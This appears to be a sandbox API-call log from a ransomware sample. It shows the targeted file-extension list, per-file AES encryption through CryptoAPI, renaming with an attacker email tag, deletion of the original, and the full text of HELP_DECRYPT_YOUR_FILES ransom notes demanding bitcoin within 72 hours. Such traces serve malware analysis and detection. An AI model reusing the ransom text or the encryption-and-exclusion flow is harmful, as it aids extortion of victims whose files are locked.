	[0182.755] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0182.755] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.756] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.756] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\_1ieasqacw 4jkwjo9.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_1ieasqacw 4jkwjo9.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0182.759] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xa169, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0xa169, lpOverlapped=0x0) returned 1
	[0182.760] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.760] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb5d8) returned 1
	[0182.761] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.761] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0182.761] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.762] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0182.762] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.762] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0182.762] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.762] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0xa169, dwBufLen=0xa169 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0xa170) returned 1
	[0182.763] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.763] RtlMoveMemory (in: Destination=0xfe72f8, Source=0xfdd180, Length=0xa169 | out: Destination=0xfe72f8) 
	[0182.763] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.763] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe72f8*, pdwDataLen=0x18bc0c*=0xa169, dwBufLen=0xa170 | out: pbData=0xfe72f8*, pdwDataLen=0x18bc0c*=0xa170) returned 1
	[0182.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.765] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0182.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.765] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0182.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.765] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0182.765] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.765] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.766] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.766] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0182.767] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\_1ieasqacw 4jkwjo9.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 94
	[0182.768] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\_1ieasqacw 4jkwjo9.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_1ieasqacw 4jkwjo9.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0182.768] WriteFile (in: hFile=0x388, lpBuffer=0xfe72f8*, nNumberOfBytesToWrite=0xa170, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe72f8*, lpNumberOfBytesWritten=0x18c068*=0xa170, lpOverlapped=0x0) returned 1
	[0182.771] CloseHandle (hObject=0x388) returned 1
	[0182.771] CloseHandle (hObject=0x384) returned 1
	[0182.771] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\_1ieasqacw 4jkwjo9.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_1ieasqacw 4jkwjo9.swf")) returned 1
	[0182.775] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\_1ieasqacw 4jkwjo9.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_1ieasqacw 4jkwjo9.swf")) returned 0
	[0182.776] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c97d70, ftCreationTime.dwHighDateTime=0x1d96eeb, ftLastAccessTime.dwLowDateTime=0xa992ec10, ftLastAccessTime.dwHighDateTime=0x1d9723d, ftLastWriteTime.dwLowDateTime=0xa992ec10, ftLastWriteTime.dwHighDateTime=0x1d9723d, nFileSizeHigh=0x0, nFileSizeLow=0xa169, dwReserved0=0x0, dwReserved1=0x0, cFileName="_1IeasQACw 4JkwJo9.swf", cAlternateFileName="_1IEAS~1.SWF")) returned 0
	[0182.776] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0182.776] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0182.776] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop"
	[0182.776] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.*"
	[0182.776] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.776] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.776] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT") returned 57
	[0182.776] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0182.777] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0182.777] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0182.778] CloseHandle (hObject=0x380) returned 1
	[0182.778] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.779] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.779] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0182.779] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0182.779] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0182.780] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0182.780] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0182.780] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0182.780] CloseHandle (hObject=0x380) returned 1
	[0182.780] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.780] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.780] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0182.780] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML") returned 58
	[0182.780] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0182.781] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0182.782] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0182.784] CloseHandle (hObject=0x380) returned 1
	[0182.784] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.784] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.785] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.785] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0182.786] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0182.786] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0182.786] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0182.787] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0182.787] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0182.787] CloseHandle (hObject=0x380) returned 1
	[0182.787] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8678bf2c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8678bf2c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0182.787] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.*") returned 33
	[0182.787] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.788] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.*", cchLength=0x21 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\*.*") returned 0x21
	[0182.788] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.788] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="windows") returned 0x0
	[0182.789] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.789] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="boot") returned 0x0
	[0182.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.790] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="system volume information") returned 0x0
	[0182.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.790] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0182.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.790] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="temp") returned 0x0
	[0182.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.791] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="program files") returned 0x0
	[0182.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.791] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="program files (x86)") returned 0x0
	[0182.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.791] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="appdata") returned 0x0
	[0182.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.792] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="application data") returned 0x0
	[0182.792] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.792] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="winnt") returned 0x0
	[0182.792] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.792] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="tmp") returned 0x0
	[0182.792] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
